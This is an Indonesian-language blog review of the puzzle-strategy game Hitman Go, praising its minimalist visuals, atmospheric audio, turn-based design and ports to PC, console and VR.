Bagi pemain baru yang belum pernah mengenal Hitman sebelumnya, Hitman Go juga berfungsi sebagai pengenalan sempurna terhadap inti gameplay franchise ini, yaitu perencanaan strategis serta pendekatan stealth yang cerdas.
Selain aspek visual dan gameplay, Hitman Go juga menawarkan kualitas audio yang sangat baik. Musik latar yang digunakan dalam game ini sengaja dibuat minimalis, dengan nada-nada yang lembut namun menegangkan, mampu memperkuat atmosfer permainan yang penuh dengan strategi dan teka-teki.
Efek suara seperti langkah kaki, bunyi alarm, hingga suara ketika figur karakter bergerak dan berinteraksi dengan objek di papan permainan dibuat sangat jelas dan tajam, menambah rasa imersi dalam permainan. Bahkan tanpa adanya dialog atau narasi lisan, Hitman Go berhasil menyampaikan cerita serta situasi di setiap level dengan efektif hanya melalui kombinasi visual dan audio yang brilian.
Awalnya dirancang untuk perangkat mobile, Hitman Go memang sangat nyaman dimainkan di berbagai situasi. Desain gameplay yang berbasis giliran memungkinkan pemain untuk memainkannya dalam sesi singkat maupun lama. Ini menjadikannya pilihan ideal bagi mereka yang ingin menikmati permainan berkualitas tinggi dalam waktu terbatas, seperti saat bepergian atau sekadar mengisi waktu luang.
Ketika Hitman Go akhirnya hadir di PC dan konsol, gameplay yang sederhana namun mendalam ini tetap terasa nyaman dimainkan, berkat desain kontrol yang intuitif dan responsif. Bahkan, versi VR-nya menambah dimensi baru yang membuat pengalaman bermain semakin unik dan mengesankan.
Hitman Go adalah bukti nyata bahwa franchise populer pun bisa sukses ketika diadaptasi ke dalam genre yang sama sekali berbeda, selama eksekusinya dilakukan dengan cerdas dan kreatif. Melalui desain visual minimalis yang elegan, gameplay puzzle-strategi yang menantang otak, hingga audio yang mengesankan, Hitman Go berhasil memberikan pengalaman yang unik dan menyenangkan bagi penggemar seri Hitman maupun pemain baru.
Bagi para gamer yang menginginkan tantangan berbeda atau sekadar mencari game ringan namun tetap menguji kecerdasan dan kreativitas, Hitman Go jelas menjadi pilihan yang sangat direkomendasikan. Sebuah spin-off yang tidak hanya layak dimainkan, tetapi juga menjadi contoh bagaimana sebuah inovasi dalam dunia game bisa dilakukan dengan sangat baik.
The post Hitman Go: Saat Game Aksi Mematikan Berubah Menjadi Strategi Papan yang Elegan! appeared first on Informasi Untukmu Seputar Game PC, Mobile Sampai Konsol.
Login